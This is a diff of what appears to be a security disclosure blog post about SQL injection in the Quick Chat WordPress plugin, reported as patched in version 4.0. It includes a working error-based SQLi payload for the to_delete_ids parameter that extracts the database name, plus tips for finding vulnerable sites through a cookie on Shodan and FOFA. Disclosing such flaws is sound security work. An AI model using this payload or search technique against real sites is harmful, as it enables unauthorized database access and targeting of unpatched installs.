metalamin/metalamin.github.io/_posts/2018-06-12-Quick-Chat-SQLi-EN.md

 {% include gallery id="gallerypoc1" %}
 {% include gallery id="gallerypoc2" %}

+*Note: if "no_participation" is set to 1, login is requiered to preceed with the injection.*

 ## SQL Injection 2

 **Status: patched on version 4.0**

-The plugin is subject to SQL injections throught the ajax call.
+The plugin was subject to SQL injections throught the ajax call.
 This SQLi can be found on the **to_delete_ids** parameter when using the action **quick-chat-ajax-delete**.

-Proof of concept to get the current database name:
+Proof of concept to get the current database name using an error based technique:
 ```sql
 action=quick-chat-ajax-delete&to_delete_ids[]=666,(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,Hex(cast(database() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
 ```

+{% include gallery id="gallerypoc2" %}

 ## Dorks
 The pluging sets the cookie "quick_chat_alias" so it can be easely tracked searching for it on [shodan.io](https://www.shodan.io/) or [fofa.so](https://fofa.so)